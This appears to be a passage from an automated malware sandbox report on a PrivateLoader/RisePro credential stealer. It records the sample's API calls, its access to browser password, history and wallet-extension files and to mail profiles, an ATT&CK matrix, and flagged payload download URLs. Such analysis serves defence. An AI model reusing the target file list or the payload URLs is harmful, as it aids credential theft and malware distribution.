                        Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_06BD02FD
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_06BD0227
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_06BD0121
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_06BB2CC6
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_06BC4ADB
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_06BC5047
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_06BCFFF8
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_06BCFC34
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_06BCFC7F
                        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_06BCFDA5
                        Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_06BCFD1A
                        Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_06BCF988
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD361D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00AD361D
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B9C990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle,0_2_06B9C990
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Yara detected RisePro Stealer
                        Source: Yara matchFile source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip, type: DROPPED
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENTJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected PrivateLoader
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Yara detected RisePro Stealer
                        Source: Yara matchFile source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts                        		1
                        Native API                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		1
                        System Time Discovery                        		Remote Services1
                        Archive Collected Data                        		4
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        Create Account                        		1
                        Valid Accounts                        		2
                        Obfuscated Files or Information                        		LSASS Memory2
                        File and Directory Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        Valid Accounts                        		1
                        Access Token Manipulation                        		1
                        DLL Side-Loading                        		Security Account Manager46
                        System Information Discovery                        		SMB/Windows Admin Shares1
                        Screen Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron1
                        Scheduled Task/Job                        		1
                        Process Injection                        		1
                        Masquerading                        		NTDS1
                        Query Registry                        		Distributed Component Object Model1
                        Email Collection                        		3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd21
                        Registry Run Keys / Startup Folder                        		1
                        Scheduled Task/Job                        		1
                        Valid Accounts                        		LSA Secrets41
                        Security Software Discovery                        		SSHKeylogging14
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                        Registry Run Keys / Startup Folder                        		1
                        Access Token Manipulation                        		Cached Domain Credentials11
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Virtualization/Sandbox Evasion                        		DCSync2
                        Process Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Process Injection                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        file.exe63%ReversingLabsWin32.Trojan.Privateloader
                        file.exe58%VirustotalBrowse
                        file.exe100%AviraHEUR/AGEN.1304046

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        easy2buy.ae4%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://ocsp.sectigo.com00%URL Reputationsafe
                        https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/0%Avira URL Cloudsafe
                        https://easy2buy.j$0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/upgrade/k.exeY100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/upgrade/k.exe100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets100%Avira URL Cloudmalware
                        https://easy2buy.ae:80/wp-content/upgrade/k.exe0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-admin/admin-ajax.php0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e60%Avira URL Cloudsafe
                        https://easy2buy.ae:80/wp-content/upgrade/k.exe5%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.74%VirustotalBrowse
                        https://easy2buy.ae/wp-admin/admin-ajax.php4%VirustotalBrowse
                        https://easy2buy.ae/property-management-and-letting/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.04%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/upgrade/k.exe0%VirustotalBrowse
                        https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/contact/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png4%VirustotalBrowse
                        https://easy2buy.ae/#/schema/logo/image/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=16904577614%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve100%Avira URL Cloudmalware
                        https://easy2buy.ae/services/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/feed/0%Avira URL Cloudsafe
                        https://easy2buy.ae/#/schema/logo/image/4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/services/4%VirustotalBrowse
                        https://easy2buy.ae/xmlrpc.php?rsd0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);100%Avira URL Cloudmalware
                        https://easy2buy.ae:80/ntControlSet0%Avira URL Cloudsafe
                        http://193.233.132.175/server/k/l2.exerCA0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.20%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);4%VirustotalBrowse
                        https://easy2buy.ae/xmlrpc.php?rsd4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0100%Avira URL Cloudmalware
                        https://easy2buy.ae/property-management-and-letting/4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.24%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/2023/06/logo.png100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/feed/4%VirustotalBrowse
                        https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?ve100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/uploads/2023/06/logo.png4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.34%VirustotalBrowse
                        https://easy2buy.ae/contact/4%VirustotalBrowse
                        https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.cs100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full4%VirustotalBrowse
                        https://easy2buy.ae/about/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/arranging-residential-visa/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=16904577624%VirustotalBrowse
                        https://easy2buy.ae0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.14%VirustotalBrowse
                        https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.20%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.20%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js100%Avira URL Cloudmalware
                        https://easy2buy.ae/investment-tax-and-accounting-advisory/0%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.00%Avira URL Cloudsafe
                        https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763100%Avira URL Cloudmalware
                        https://easy2buy.ae/wp-json/0%Avira URL Cloudsafe
                        https://easy2buy.ae/comments/feed/0%Avira URL Cloudsafe
